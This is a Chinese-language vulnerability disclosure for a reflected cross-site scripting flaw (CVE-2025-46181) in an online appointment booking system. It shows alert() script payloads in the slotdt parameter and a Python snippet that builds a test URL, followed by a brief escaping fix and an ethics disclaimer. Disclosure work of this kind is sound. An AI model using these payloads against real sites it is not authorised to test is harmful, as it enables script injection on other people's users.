CVE-ID:CVE-2025-46181
发现者:Shemkumar P(shemkumar.github.io)
漏洞类型:反射型跨站脚本(XSS)
严重性:中危
状态:已披露,MITRE 已分配 CVE
某公开在线预约挂号系统(v1.0)中存在**反射型跨站脚本(XSS)**漏洞,具体位于处理预约确认的页面。由于一个 GET 参数未能正确过滤输入,攻击者可在受害者的浏览器中注入并执行 JavaScript 代码。
GET /confirmapp.php?slotdt=<payload>
示例载荷(编码后):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 出于道德原因,真实链接已隐去。 该漏洞已在受控环境中完成测试。
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
应用程序应:
htmlspecialchars() 对用户输入进行转义Shemkumar P
🕸️ shemkumar.github.io
🔐 网络安全研究员 | CTF 爱好者 | CVE 报告者
⚠️ 本文档仅供教育和防御用途。在未拥有或未经明确授权的系统上测试或利用漏洞属于非法且不道德的行为。